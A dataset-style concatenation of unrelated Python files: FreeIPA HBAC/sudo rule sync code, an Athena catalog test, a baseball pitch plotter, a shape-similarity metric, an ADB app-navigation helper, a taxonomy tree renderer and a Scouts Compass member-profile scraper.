result = super(FreeIPARule, self).create_commands(remote_entity)
result.extend(self._process_rule_membership(remote_entity))
return result
def _process_rule_membership(self, remote_entity):
"""
        Prepare commands for an HBAC/sudo rule membership update.
        If the rule previously had any members, these are removed,
        as a rule can only have one usergroup and one hostgroup as members.
        :param FreeIPARule remote_entity: remote entity data (may be None)
"""
commands = []
for key, member_type, cmd_key in (
('memberhost', 'hostgroup', 'host'),
('memberuser', 'group', 'user'),
('memberservice', 'hbacsvc', 'service')):
local_members = set(self.data_ipa.get(key, []))
if remote_entity:
search_key = '%s_%s' % (key, member_type)
remote_members = set(
remote_entity.data_ipa.get(search_key, []))
else:
remote_members = set()
command = '%s_add_%s' % (self.entity_name, cmd_key)
for member in local_members - remote_members:
diff = {member_type: member}
commands.append(
Command(command, diff, self.name, self.entity_id_type))
command = '%s_remove_%s' % (self.entity_name, cmd_key)
for member in remote_members - local_members:
diff = {member_type: member}
commands.append(
Command(command, diff, self.name, self.entity_id_type))
return commands
class FreeIPAHBACRule(FreeIPARule):
"""Representation of a FreeIPA HBAC (host-based access control) rule."""
entity_name = 'hbacrule'
default_attributes = ['serviceCategory']
managed_attributes_push = ['description', 'serviceCategory']
validation_schema = voluptuous.Schema(schemas.schema_hbac)
def __init__(self, name, data, path=None):
"""
Create a HBAC rule instance.
This override is needed to set the servicecat parameter.
"""
if path: # only edit local entities
if not data: # may be None; we want to ensure dictionary
data = dict()
if 'memberService' not in data:
data.update({'serviceCategory': 'all'})
elif 'serviceCategory' in data:
raise IntegrityError(
'%s cannot contain both memberService and serviceCategory'
% name)
super(FreeIPAHBACRule, self).__init__(name, data, path)
class FreeIPASudoRule(FreeIPARule):
"""Representation of a FreeIPA sudo rule."""
entity_name = 'sudorule'
default_attributes = [
'cmdCategory', 'options', 'runAsGroupCategory', 'runAsUserCategory']
managed_attributes_push = [
'cmdCategory', 'description',
'ipaSudoRunAsGroupCategory', 'ipaSudoRunAsUserCategory']
managed_attributes_pull = managed_attributes_push + ['ipaSudoOpt']
key_mapping = {
'options': 'ipaSudoOpt',
'runAsGroupCategory': 'ipaSudoRunAsGroupCategory',
'runAsUserCategory': 'ipaSudoRunAsUserCategory'
}
validation_schema = voluptuous.Schema(schemas.schema_sudo)
def __init__(self, name, data, path=None):
"""
Create a sudorule instance.
This override is needed to set the options & runAs params.
"""
if path: # only edit local entities
if not data: # may be None; we want to ensure dictionary
data = dict()
data.update({'options': ['!authenticate', '!requiretty'],
'cmdCategory': 'all',
'runAsUserCategory': 'all',
'runAsGroupCategory': 'all'})
super(FreeIPASudoRule, self).__init__(name, data, path)
def _convert_to_repo(self, data):
result = super(FreeIPASudoRule, self)._convert_to_repo(data)
if isinstance(result.get('options'), unicode):
result['options'] = [result['options']]
return result
def create_commands(self, remote_entity=None):
"""
Create commands to execute in order to update the rule.
Extends the basic command creation with sudorule option update.
:param dict remote_entity: remote rule data
:returns: list of commands to execute
:rtype: list(Command)
"""
result = super(FreeIPASudoRule, self).create_commands(remote_entity)
result.extend(self._parse_sudo_options(remote_entity))
return result
def _parse_sudo_options(self, remote_entity):
"""
Prepare commands for sudo rule options update. This includes
deletion of old options that are no longer in configuration
as well as addition of new options.
:param dict remote_entity: remote entity data (can be None)
:returns: list of sudorule option update commands to execute
:rtype: list(Command)
"""
commands = []
local_options = set(self.data_repo.get('options', []))
if remote_entity:
remote_options = set(remote_entity.data_ipa.get('ipasudoopt', []))
else:
remote_options = set()
command = 'sudorule_add_option'
for opt in local_options - remote_options:
diff = {'ipasudoopt': [opt]}
commands.append(
Command(command, diff, self.name, self.entity_id_type))
command = 'sudorule_remove_option'
for opt in remote_options - local_options:
diff = {'ipasudoopt': [opt]}
commands.append(
Command(command, diff, self.name, self.entity_id_type))
return commands
class FreeIPAHBACService(FreeIPAEntity):
"""Entity to hold the info about FreeIPA HBACServices"""
entity_name = 'hbacsvc'
managed_attributes_push = ['description']
managed_attributes_pull = managed_attributes_push
validation_schema = voluptuous.Schema(schemas.schema_hbacservices)
class FreeIPAHBACServiceGroup(FreeIPAEntity):
"""Entity to hold the info about FreeIPA HBACServiceGroups"""
entity_name = 'hbacsvcgroup'
managed_attributes_push = ['description']
managed_attributes_pull = managed_attributes_push
allowed_members = ['hbacsvc']
validation_schema = voluptuous.Schema(schemas.schema_hbacsvcgroups)
class FreeIPARole(FreeIPAEntity):
"""Entity to hold the info about FreeIPA Roles"""
entity_name = 'role'
managed_attributes_pull = ['description']
managed_attributes_push = managed_attributes_pull
allowed_members = ['user', 'group', 'service', 'hostgroup']
validation_schema = voluptuous.Schema(schemas.schema_roles)
class FreeIPAPrivilege(FreeIPAEntity):
"""Entity to hold the info about FreeIPA Privilege"""
entity_name = 'privilege'
managed_attributes_pull = ['description']
managed_attributes_push = managed_attributes_pull
allowed_members = ['role']
validation_schema = voluptuous.Schema(schemas.schema_privileges)
class FreeIPAPermission(FreeIPAEntity):
"""Entity to hold the info about FreeIPA Permission"""
entity_name = 'permission'
managed_attributes_pull = ['description', 'subtree', 'attrs',
'ipapermlocation', 'ipapermright',
'ipapermdefaultattr']
managed_attributes_push = managed_attributes_pull
key_mapping = {
'grantedRights': 'ipapermright',
'attributes': 'attrs',
'location': 'ipapermlocation',
'defaultAttr': 'ipapermdefaultattr'
}
allowed_members = ['privilege']
validation_schema = voluptuous.Schema(schemas.schema_permissions)
class FreeIPAService(FreeIPAEntity):
"""
Entity to hold the info about FreeIPA Services
PUSH NOT SUPPORTED yet
"""
entity_name = 'service'
entity_id_type = 'krbcanonicalname'
managed_attributes_push = [] # Empty because we don't support push
managed_attributes_pull = ['managedby_host', 'description']
key_mapping = {
'managedBy': 'managedby_host',
}
validation_schema = voluptuous.Schema(schemas.schema_services)
def write_to_file(self):
"""
Converts the file name format from xyz/hostname.int.na.intgdc.com
to xyz-hostname_int_na_intgdc_com.yaml
"""
path, file_name = os.path.split(self.path)
service_name, _ = file_name.split('@')
self.path = ('%s-%s.yaml' % (path, service_name.replace('.', '_')))
super(FreeIPAService, self).write_to_file()
class EntityDumper(yaml.SafeDumper):
"""YAML dumper subclass used to fix under-indent of lists when dumping."""
def __init__(self, *args, **kwargs):
super(EntityDumper, self).__init__(*args, **kwargs)
self.add_representer(type(None), self._none_representer())
def increase_indent(self, flow=False, indentless=False):
return super(EntityDumper, self).increase_indent(flow, False)
def _none_representer(self):
"""
Enable correct representation of empty values in config
by representing None as empty string instead of 'null'.
"""
def representer(dumper, value):
return dumper.represent_scalar(u'tag:yaml.org,2002:null', '')
return representer
| 2.015625 | 2 |
test/test_catalog_manager.py | weknowtraining/athena-glue-service-logs | 133 | 6869 | # pylint: skip-file
from athena_glue_service_logs.catalog_manager import BaseCatalogManager
def test_class_init(mocker):
mocker.patch.multiple(BaseCatalogManager, __abstractmethods__=set())
base_catalog = BaseCatalogManager('us-west-2', 'dbname', 'tablename', 's3://somewhere')
assert base_catalog.database_name == 'dbname'
assert base_catalog.s3_location == 's3://somewhere'
assert base_catalog.table_name == 'tablename'
def test_init_with_partitions(mocker):
mocker.patch.multiple(BaseCatalogManager, __abstractmethods__=set())
mocker.patch('athena_glue_service_logs.catalog_manager.BaseCatalogManager.does_database_exist', return_value=True)
mocker.patch('athena_glue_service_logs.catalog_manager.BaseCatalogManager.create_database')
mocker.patch('athena_glue_service_logs.catalog_manager.BaseCatalogManager.create_table')
mocker.patch('athena_glue_service_logs.catalog_manager.BaseCatalogManager.create_partitions')
base_catalog = BaseCatalogManager('us-west-2', 'dbname', 'tablename', 's3://somewhere')
base_catalog.initialize_with_partitions(['a', 'b', 'c'])
assert BaseCatalogManager.create_database.call_count == 0
BaseCatalogManager.create_table.assert_called_once()
BaseCatalogManager.create_partitions.assert_called_once_with(partition_list=['a', 'b', 'c'])
mocker.patch('athena_glue_service_logs.catalog_manager.BaseCatalogManager.does_database_exist', return_value=False)
base_catalog.initialize_with_partitions(['a', 'b', 'c'])
assert BaseCatalogManager.create_database.call_count == 1
| 1.945313 | 2 |
unsorted/pythonsnippets_0013.py | fiddlerwoaroof/sandbox | 0 | 6870 | from twisted.internet import reactor
reactor.listenTCP(8789, factory)
reactor.run() | 1.398438 | 1 |
__main__.py | SHUcream00/MLBPitchVisual | 0 | 6871 | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
def visualize(dataframe, balltype):
df = dataframe
#Filter by balltype
res = df[df["pitch_type"] == balltype]
#Group by results
groups = res.groupby("description")
for name, group in groups:
if name == "miss":
plt.plot(group["plate_x"], group["plate_z"], marker="o", linestyle="", color="none", ms = 3, mec="#9A9A9A", label=name)
else:
plt.plot(group["plate_x"], group["plate_z"], marker="o", linestyle="", color="none", ms = 3, mec="#03A77F", label=name)
#Fixing the viewpoint of the plot
axes = plt.gca()
axes.set_xlim([-2.50,2.50])
axes.set_ylim([0.00,5.00])
#Setting strike zone
sz_top_avg = res["sz_top"].mean()
sz_bottom_avg = res["sz_bot"].mean()
sz_left = -0.85
sz_right = 0.85
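    # Note (assumption): Statcast plate_x/plate_z are measured in feet, so +/-0.85 ft here
    # approximates the horizontal edges of the zone (home plate is 17 inches wide)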
#Drawing strike zone
plt.plot((sz_left, sz_right), (sz_top_avg, sz_top_avg), 'k-')
plt.plot((sz_left, sz_right), (sz_bottom_avg, sz_bottom_avg), 'k-')
plt.plot((sz_left, sz_left), (sz_top_avg, sz_bottom_avg), 'k-')
plt.plot((sz_right, sz_right), (sz_top_avg, sz_bottom_avg), 'k-')
#Setting labels
plt.xlabel("Horizontal Location")
plt.ylabel("Vertical Location")
plt.title(f"{player_name} 2018\n {ballname_dict.get(balltype, balltype)}")
plt.legend()
plt.show()
#Setting up Name and CSV location
player_name = "Put player name"
file_src = "Put target csv"
raw = pd.read_csv(file_src)
df = pd.DataFrame(raw)
#For filtering cases
replace_dict = {"description": {"hit_into_play_no_out": "contact", "hit_into_play": "contact", "hit_into_play_score": "contact", "swinging_strike": "miss", "swinging_strike_blocked": "miss"}}
ballname_dict = {"FF": "4-Seam Fastball", "CH": "Changeup", "CU": "Curveball", "SL": "Slider", "FT": "2-Seam Fastball", "AB": "Automatic Ball",
"AS": "Automatic Strike", "EP": "Eephus", "FC": "Cutter", "FO": "Forkball", "FS": "Splitter", "GY": "Gyroball", "IN": "Intentional Ball",
"KC": "Knuckle Curve", "NP": "No Pitch", "PO": "Pitchout", "SC": "Screwball", "SI": "Sinker", "UN": "Unknown"}
df = df.replace(replace_dict)
df = df[df["description"].isin(["contact", "miss"])]
for i in df["pitch_type"].unique():
visualize(df, i)
| 3.375 | 3 |
shape_similarity.py | Toonwire/infancy_eye_tracking | 0 | 6872 | # -*- coding: utf-8 -*-
"""
Created on Sat May 25 13:17:49 2019
@author: Toonw
"""
import numpy as np
def vlen(a):
return (a[0]**2 + a[1]**2)**0.5
def add(v1,v2):
return (v1[0]+v2[0], v1[1]+v2[1])
def sub(v1,v2):
return (v1[0]-v2[0], v1[1]-v2[1])
def unit_vector(v):
vu = v / np.linalg.norm(v)
return (vu[0], vu[1])
def angle_between(v1, v2):
angle = np.arccos(np.dot(v1,v2)/(vlen(v1)*vlen(v2)))
return angle
# Similarity measure of article
## https://pdfs.semanticscholar.org/60b5/aca20ba34d424f4236359bd5e6aa30487682.pdf
def sim_measure(A, B): # similarity between two shapes A and B
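    # A and B are equal-length sequences of 2-D vectors, e.g. A = [(1, 0), (0, 1)], B = [(1, 1), (0, 2)];
    # the result lies in [0, 1], with 1 meaning every corresponding pair points in the same direction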
# print(A)
# print(B)
return 1 - (sum([(vlen(unit_vector(a))+vlen(unit_vector(b)))*angle_between(a,b) for a,b in zip(A,B)]))/(np.pi*(len(A)+len(B))) | 2.859375 | 3 |
apps/chats/apps.py | aldwyn/effigia | 1 | 6873 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.apps import AppConfig
class ChatsConfig(AppConfig):
name = 'apps.chats'
def ready(self):
from actstream import registry
registry.register(*self.get_models())
| 1.734375 | 2 |
utils/ghost.py | JayJJChen/LoveXueXiQiangGuo | 3 | 6874 | <gh_stars>1-10
import os
import time
from utils.eye import Eye
from utils.finger import Finger
class Ghost:
"""class to navigate the app, with Eye and Finger"""
def __init__(self, adb_path, temp_path, sleep_sec=2):
self.eye = Eye(adb_path, temp_path)
self.finger = Finger(adb_path, sleep_sec=sleep_sec)
def to_main(self):
"""back to main page, doesn't support back from exam"""
num_attempts = 0
max_try = 10
while not self._in_main():
if self._in_exam():
self._exit_exam()
else:
self.finger.back()
num_attempts += 1
if num_attempts >= max_try: # failsafe
input("I'm lost! Please help me go to main page! Hit Enter to continue")
def to_score(self):
"""click the score from main page"""
self._bottom_tab(2)
self._goto("score")
def to_exam_root(self):
"""go to the exam page root from main page"""
self._bottom_tab(4)
self._goto("exam_icon")
def _exit_exam(self):
"""exit during exam to main"""
self.finger.back()
self._goto("exit_exam")
self.finger.back()
def swipe_up(self):
self.finger.swipe(500, 1000, 500, 500)
def swipe_down(self):
self.finger.swipe(500, 500, 500, 1000)
def _find_weekly_exam(self):
"""find available weekly exam in weekly exam page"""
path = self._image_path("start_exam")
coords = self.eye.find(path, multi_target=False)
fail_count = 0
while coords is None:
# swipe up if there's no "start_exam"
time.sleep(2)
self.swipe_up()
            coords = self.eye.find(path, multi_target=False)
            fail_count += 1  # count failed attempts so the failsafe below can actually trigger
            if (fail_count > 10) and (coords is None):
raise RuntimeError("I'm lost! Exiting!")
self.finger.tap(*coords[0])
def _goto(self, img_name):
path = self._image_path(img_name)
coords = self.eye.find(path, multi_target=False)
fail_count = 0
while coords is None:
time.sleep(2)
            coords = self.eye.find(path, multi_target=False)
            fail_count += 1  # count failed attempts so the failsafe below can actually trigger
            if (fail_count > 5) and (coords is None):
raise RuntimeError("I'm lost! Exiting!")
self.finger.tap(*coords[0])
def _bottom_tab(self, n):
"""
navigate to bottom n_th tab, the screen resolution is 1080x1920
args
n: int, n_th bottom tab
{
            n=0: 消息 (Messages)
            n=1: 关注 (Following)
            n=2: 学习 (Study)
            n=3: 视频学习 (Video Learning)
            n=4: 我的 (Me)
}
"""
x = [108 + 108 * 2 * i for i in range(5)]
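        # evaluates to [108, 324, 540, 756, 972]: the five tab centres across a 1080-px-wide screen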
y = 1850
self.finger.tap(x[n], y)
def _in_exam(self):
image = self.eye.see()
in_exam = self.eye.find(self._image_path("in_exam"), img=image, multi_target=False)
if in_exam is not None:
return True
else:
return False
def _in_main(self):
image = self.eye.see()
main_act = self.eye.find(self._image_path("main_act"), img=image, multi_target=False)
main_inact = self.eye.find(self._image_path("main_inact"), img=image, multi_target=False)
if (main_act is not None) or (main_inact is not None):
return True
else:
return False
@staticmethod
def _image_path(img_name):
path = os.path.join("images", "{}.png".format(img_name))
return path
| 2.984375 | 3 |
src_taxonomy/bubble_tree_map.py | sanja7s/SR_Twitter | 0 | 6875 | <filename>src_taxonomy/bubble_tree_map.py
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import random
from ete2 import Tree, TreeStyle, NodeStyle, faces, AttrFace, CircleFace, TextFace
def layout(node):
if not node.is_root():
# Add node name to laef nodes
#N = AttrFace("name", fsize=14, fgcolor="black")
#faces.add_face_to_node(N, node, 0)
#pass
faces.add_face_to_node(TextFace(node.name), node, 0)
if "weight" in node.features:
# Creates a sphere face whose size is proportional to node's
# feature "weight"
C = CircleFace(radius=node.weight, color="RoyalBlue", style="sphere")
# Let's make the sphere transparent
C.opacity = 0.3
# And place as a float face over the tree
faces.add_face_to_node(C, node, 0, position="float")
def give_tree_layout(t):
# Some random features in all nodes
for n in t.traverse():
n.add_features(weight=n.dist*20)
# Create an empty TreeStyle
ts = TreeStyle()
# Set our custom layout function
ts.layout_fn = layout
# Draw a tree
#ts.mode = "c"
#ts.arc_start = -180
#ts.arc_span = 180
# We will add node names manually
#ts.show_leaf_name = True
# Show branch data
#ts.show_branch_length = True
#ts.show_branch_support = True
return ts
class Tree7s(object):
def __init__(self, lab):
self.root = Node7s(lab, 0, 0)
def find_root(self):
return self.root
class Node7s(object):
def __init__(self, data, score, lev):
self.data = data
self.score = score
self.level = lev
self.children = []
def add_child(self, lab, score, lev):
if int(self.level) == int(lev-1):
nn = self.find_child(lab)
if nn == None:
self.children.append(Node7s(lab, score, lev))
else:
nn.increase_score(score)
else:
print "Trying to add to a wrong level?", lev-1, self.level, lab, self.data
def find_child(self, label):
for el in self.children:
if el.data == label:
return el
return None
def increase_score(self, sc):
self.score += sc
def print_me(self):
print self.data, self.score
for el in self.children:
el.print_me()
def create_newick(self):
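        # builds a Newick string bottom-up; e.g. a level-0 root "R" with leaf children
        # a (score 1.0) and b (score 2.0) yields "(a:1.0,b:2.0)R."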
if self.children == []:
return str(self.data + ":" + str(self.score))
newick = "("
for el in self.children:
newick += el.create_newick() + ","
newick = newick[:-1]
if self.level == 0:
newick += ")" + str(self.data) + "."
else:
newick += ")" + str(self.data) + ":" + str(self.score)
return newick
def test_data():
D = {'taxonomy': [{"score": "0.718868", "label": "/art and entertainment/movies and tv/movies"},\
{"confident": "no", "score": "0.304296", "label": "/pets/cats"},\
{"score": "0.718868", "label": "/art and entertainment/movies and tv/series"}]}
t7s = Tree7s("ThingAdamsFamily")
for el in D["taxonomy"]:
#n = t7s
n = t7s.find_root()
taxonomy_tree = el["label"]
taxonomy_tree = taxonomy_tree.split("/")
taxonomy_tree.pop(0)
levels = len(taxonomy_tree)
score = float(el["score"])
print levels, taxonomy_tree, score
for i in range(levels):
label = taxonomy_tree[i]
#if n.find_child(label) == None:
n.add_child(label, score, i+1)
n = n.find_child(label)
t7s.find_root().print_me()
t = t7s.find_root()
S = t.create_newick() + ";"
print S
#S = "(((A,B,(C.,D)E)F,(S,N)K)R);"
#T = Tree(S, format=8)
T = Tree(S, format=1)
for node in T.traverse("postorder"):
# Do some analysis on node
print node.name
for node in T.traverse("levelorder"):
# Do some analysis on node
print node.name
#for branch in T
return T
if __name__ == "__main__":
#t.render("bubble_map.png", w=600, dpi=300, tree_style=ts)
#t.show(tree_style=ts)
t = test_data()
ts = give_tree_layout(t)
t.show(tree_style=ts)
t.render("bubble_map.png", w=600, dpi=300, tree_style=ts) | 3.421875 | 3 |
compass/core/_scrapers/member.py | MrNoScript/compass-interface-core | 0 | 6876 | <reponame>MrNoScript/compass-interface-core
from __future__ import annotations
import re
import time
from typing import get_args, Literal, TYPE_CHECKING, Union
from lxml import html
from compass.core.interface_base import InterfaceBase
from compass.core.logger import logger
from compass.core.schemas import member as schema
from compass.core.settings import Settings
from compass.core.utility import cast
from compass.core.utility import maybe_int
from compass.core.utility import parse
if TYPE_CHECKING:
import requests
MEMBER_PROFILE_TAB_TYPES = Literal[
"Personal", "Roles", "Permits", "Training", "Awards", "Emergency", "Comms", "Visibility", "Disclosures"
]
class PeopleScraper(InterfaceBase):
"""Class directly interfaces with Compass operations to extract member data.
Compass's MemberProfile.aspx has 13 tabs:
1. Personal Details (No Key)
2. Your Children (Page=CHILD)
3. Roles (Page=ROLES)
4. Permits (Page=PERMITS)
5. Training (Page=TRAINING)
6. Awards (Page=AWARDS)
7. Youth Badges/Awards (Page=BADGES)
8. Event Invitations (Page=EVENTS)
9. Emergency Details (Page=EMERGENCY)
10. Communications (Page=COMMS)
11. Visibility (Page=VISIBILITY)
12. Disclosures (Page=DISCLOSURES)
13. Parents/Guardians (Page=PARENT)
Of these, tabs 2, 7, 8, 13 are disabled functionality.
Tab 11 (Visibility) is only shown on the members' own profile.
    For member-adjacent operations there are additional endpoints:
- /Popups/Profile/AssignNewRole.aspx
- /Popups/Maint/NewPermit.aspx
- /Popups/Profile/EditProfile.aspx
Currently we only use one of these endpoints (AssignNewRole), as all
other data we need can be found from the MemberProfile tabs.
All functions in the class output native types.
"""
def __init__(self, session: requests.Session, validate: bool = False):
"""Constructor for PeopleScraper.
takes an initialised Session object from Logon
"""
super().__init__(session)
self.validate = validate
def _get_member_profile_tab(self, membership_num: int, profile_tab: MEMBER_PROFILE_TAB_TYPES) -> bytes:
"""Returns data from a given tab in MemberProfile for a given member.
Args:
membership_num: Membership Number to use
profile_tab: Tab requested from Compass
Returns:
A dict with content and encoding, e.g.:
{"content": b"...", "encoding": "utf-8"}
Both keys will always be present.
Raises:
ValueError: The given profile_tab value is illegal
Todo:
Other possible exceptions? i.e. from Requests
"""
profile_tab = profile_tab.upper()
tabs = tuple(tab.upper() for tab in get_args(MEMBER_PROFILE_TAB_TYPES))
url = f"{Settings.base_url}/MemberProfile.aspx?CN={membership_num}"
if profile_tab == "PERSONAL": # Personal tab has no key so is a special case
response = self._get(url)
elif profile_tab in tabs:
url += f"&Page={profile_tab}&TAB"
response = self._get(url)
else:
raise ValueError(f"Specified member profile tab {profile_tab} is invalid. Allowed values are {tabs}")
return response.content
def get_personal_tab(self, membership_num: int) -> Union[schema.MemberDetails, dict]:
"""Returns data from Personal Details tab for a given member.
Args:
membership_num: Membership Number to use
Returns:
A dict mapping keys to the corresponding data from the personal
data tab.
For example:
{'membership_number': ...,
'forenames': '...',
'surname': '...',
'main_phone': '...',
'main_email': '...',
'name': '...',
'known_as': '...',
'join_date': datetime.datetime(...),
'sex': '...',
'birth_date': datetime.datetime(...),
'nationality': '...',
'ethnicity': '...',
'religion': '...',
'occupation': '...',
'address': '...'}
Keys will be present only if valid data could be extracted and
parsed from Compass.
Raises:
PermissionError:
Access to the member is not given by the current authentication
Todo:
Other possible exceptions? i.e. from Requests
"""
response = self._get_member_profile_tab(membership_num, "Personal")
tree = html.fromstring(response)
if tree.forms[0].action == "./ScoutsPortal.aspx?Invalid=AccessCN":
raise PermissionError(f"You do not have permission to the details of {membership_num}")
details = dict()
# ### Extractors
# ## Core:
details["membership_number"] = membership_num
# Name(s)
names = tree.xpath("//title//text()")[0].strip().split(" ")[3:]
details["forenames"] = names[0]
details["surname"] = " ".join(names[1:])
# Main Phone
details["main_phone"] = tree.xpath('string(//*[text()="Phone"]/../../../td[3])')
# Main Email
details["main_email"] = tree.xpath('string(//*[text()="Email"]/../../../td[3])')
# ## Core - Positional:
# Full Name
details["name"] = tree.xpath("string(//*[@id='divProfile0']//tr[1]/td[2]/label)")
# Known As
details["known_as"] = tree.xpath("string(//*[@id='divProfile0']//tr[2]/td[2]/label)")
# Join Date # TODO Unknown - take date from earliest role?
join_date_str = tree.xpath("string(//*[@id='divProfile0']//tr[4]/td[2]/label)")
details["join_date"] = parse(join_date_str) if join_date_str != "Unknown" else None
# ## Position Varies, only if authorised:
# Gender
details["sex"] = tree.xpath("string(//*[@id='divProfile0']//*[text()='Gender:']/../../td[2])")
# DOB
details["birth_date"] = parse(tree.xpath("string(//*[@id='divProfile0']//*[text()='Date of Birth:']/../../td[2])"))
# Nationality
details["nationality"] = tree.xpath("string(//*[@id='divProfile0']//*[text()='Nationality:']/../../td[2])")
# Ethnicity
details["ethnicity"] = tree.xpath("normalize-space(//*[@id='divProfile0']//*[text()='Ethnicity:']/../../td[2])")
# Religion
details["religion"] = tree.xpath("normalize-space(//*[@id='divProfile0']//*[text()='Religion/Faith:']/../../td[2])")
# Occupation
details["occupation"] = tree.xpath("normalize-space(//*[@id='divProfile0']//*[text()='Occupation:']/../../td[2])")
# Address
details["address"] = tree.xpath('string(//*[text()="Address"]/../../../td[3])')
# Filter out keys with no value.
details = {k: v for k, v in details.items() if v}
if self.validate:
return schema.MemberDetails.parse_obj(details)
else:
return details
def get_roles_tab(self, membership_num: int, keep_non_volunteer_roles: bool = False) -> Union[schema.MemberRolesDict, dict]:
"""Returns data from Roles tab for a given member.
Sanitises the data to a common format, and removes Occasional Helper, Network, and PVG roles by default.
Args:
membership_num: Membership Number to use
keep_non_volunteer_roles: Keep Helper (OH/PVG) & Network roles?
Returns:
A dict of dicts mapping keys to the corresponding data from the roles tab.
E.g.:
{1234578:
{'role_number': 1234578,
'membership_number': ...,
'role_title': '...',
'role_class': '...',
'role_type': '...',
'location_id': ...,
'location_name': '...',
'role_start_date': datetime.datetime(...),
'role_end': datetime.datetime(...),
'role_status': '...'},
{...}
}
Keys will always be present.
Raises:
PermissionError:
Access to the member is not given by the current authentication
Todo:
Other possible exceptions? i.e. from Requests
primary_role
"""
logger.debug(f"getting roles tab for member number: {membership_num}")
response = self._get_member_profile_tab(membership_num, "Roles")
tree = html.fromstring(response)
if tree.forms[0].action == "./ScoutsPortal.aspx?Invalid=AccessCN":
raise PermissionError(f"You do not have permission to the details of {membership_num}")
roles_data = {}
rows = tree.xpath("//tbody/tr")
for row in rows:
# Get children (cells in row)
cells = list(row) # filter out empty elements
# If current role allows selection of role for editing, remove tickbox
if any(el.tag == "input" for el in cells[0]):
cells.pop(0)
role_number = int(row.get("data-pk"))
status_with_review = cells[5].text_content().strip()
if status_with_review.startswith("Full Review Due "):
role_status = "Full"
review_date = parse(status_with_review.removeprefix("Full Review Due "))
else:
role_status = status_with_review
review_date = None
role_details = dict(
role_number=role_number,
membership_number=membership_num,
role_title=cells[0].text_content().strip(),
role_class=cells[1].text_content().strip(),
# role_type only visible if access to System Admin tab
role_type=[*row.xpath("./td[1]/*/@title"), None][0],
# location_id only visible if role is in hierarchy AND location still exists
location_id=cells[2][0].get("data-ng_id"),
location_name=cells[2].text_content().strip(),
role_start=parse(cells[3].text_content().strip()),
role_end=parse(cells[4].text_content().strip()),
role_status=role_status,
review_date=review_date,
can_view_details=any("VIEWROLE" in el.get("class") for el in cells[6]),
)
# Remove OHs etc from list
if not keep_non_volunteer_roles and (
"helper" in role_details["role_class"].lower()
or {role_details["role_title"].lower()} <= {"occasional helper", "pvg", "network member"}
):
continue
roles_data[role_number] = role_details
if self.validate:
return schema.MemberRolesDict.parse_obj(roles_data)
else:
return roles_data
def get_training_tab(
self, membership_num: int, ongoing_only: bool = False
) -> Union[schema.MemberTrainingTab, schema.MemberMOGLList, dict]:
"""Returns data from Training tab for a given member.
Args:
membership_num: Membership Number to use
            ongoing_only: Return only the ongoing learning (MOGL) data? Otherwise returns all data
Returns:
A dict mapping keys to the corresponding data from the training
tab.
E.g.:
{'roles': {1234567: {'role_number': 1234567,
'role_title': '...',
'role_start': datetime.datetime(...),
'role_status': '...',
'location': '...',
'ta_data': '...',
'ta_number': '...',
'ta_name': '...',
'completion': '...',
'wood_badge_number': '...'},
...},
'plps': {1234567: [{'pk': 6142511,
'module_id': ...,
'code': '...',
'name': '...',
'learning_required': False,
'learning_method': '...',
'learning_completed': '...',
'validated_membership_number': '...',
'validated_name': '...'},
...],
...},
'mandatory': {'GDPR':
{'name': 'GDPR',
'completed_date': datetime.datetime(...)},
...}}
Keys will always be present.
Todo:
Other possible exceptions? i.e. from Requests
"""
# pylint: disable=too-many-locals,too-many-statements
response = self._get_member_profile_tab(membership_num, "Training")
tree = html.fromstring(response)
rows = tree.xpath("//table[@id='tbl_p5_TrainModules']/tr")
training_plps = {}
training_roles = {}
for row in rows:
# Personal Learning Plan (PLP) data
if "trPLP" in row.classes:
plp = row
plp_table = plp.getchildren()[0].getchildren()[0]
plp_data = []
for module_row in plp_table:
if module_row.get("class") != "msTR trMTMN":
continue
module_data = {}
child_nodes = list(module_row)
module_data["pk"] = int(module_row.get("data-pk"))
module_data["module_id"] = int(child_nodes[0].get("id")[4:])
matches = re.match(r"^([A-Z0-9]+) - (.+)$", child_nodes[0].text_content()).groups()
if matches:
module_data["code"] = str(matches[0])
module_data["name"] = matches[1]
# Skip processing if we only want ongoing learning data and the module is not GDPR.
if ongoing_only and "gdpr" not in module_data["code"].lower():
continue
learning_required = child_nodes[1].text_content().lower()
module_data["learning_required"] = "yes" in learning_required if learning_required else None
module_data["learning_method"] = child_nodes[2].text_content() or None
module_data["learning_completed"] = parse(child_nodes[3].text_content())
module_data["learning_date"] = parse(child_nodes[3].text_content())
validated_by_string = child_nodes[4].text_content()
if validated_by_string:
# Add empty item to prevent IndexError
validated_by_data = validated_by_string.split(" ", maxsplit=1) + [""]
module_data["validated_membership_number"] = maybe_int(validated_by_data[0])
module_data["validated_name"] = validated_by_data[1]
module_data["validated_date"] = parse(child_nodes[5].text_content())
plp_data.append(module_data)
training_plps[int(plp_table.get("data-pk"))] = plp_data
# Role data
if "msTR" in row.classes:
role = row
child_nodes = list(role)
info = {} # NoQA
info["role_number"] = int(role.xpath("./@data-ng_mrn")[0])
info["role_title"] = child_nodes[0].text_content()
info["role_start"] = parse(child_nodes[1].text_content())
status_with_review = child_nodes[2].text_content()
if status_with_review.startswith("Full (Review Due: "):
info["role_status"] = "Full"
info["review_date"] = parse(status_with_review.removeprefix("Full (Review Due: ").removesuffix(")"))
else:
info["role_status"] = status_with_review
info["review_date"] = None
info["location"] = child_nodes[3].text_content()
training_advisor_string = child_nodes[4].text_content()
if training_advisor_string:
info["ta_data"] = training_advisor_string
# Add empty item to prevent IndexError
training_advisor_data = training_advisor_string.split(" ", maxsplit=1) + [""]
info["ta_number"] = maybe_int(training_advisor_data[0])
info["ta_name"] = training_advisor_data[1]
completion_string = child_nodes[5].text_content()
if completion_string:
info["completion"] = completion_string
parts = completion_string.split(":")
info["completion_type"] = parts[0].strip()
info["completion_date"] = parse(parts[1].strip())
assert len(parts) <= 2, parts[2:]
# info["ct"] = parts[3:] # TODO what is this? From CompassRead.php
info["wood_badge_number"] = child_nodes[5].get("id", "").removeprefix("WB_") or None
training_roles[info["role_number"]] = info
# Handle GDPR:
# Get latest GDPR date
training_ogl = {
"GDPR": dict(
name="GDPR",
completed_date=next(
reversed(
sorted(mod["validated_date"] for plp in training_plps.values() for mod in plp if mod["code"] == "GDPR")
),
None,
),
),
}
for ongoing_learning in tree.xpath("//tr[@data-ng_code]"):
cell_text = {c.get("id", "<None>").split("_")[0]: c.text_content() for c in ongoing_learning}
training_ogl[ongoing_learning.get("data-ng_code")] = dict(
name=cell_text.get("<None>"),
completed_date=parse(cell_text.get("tdLastComplete")),
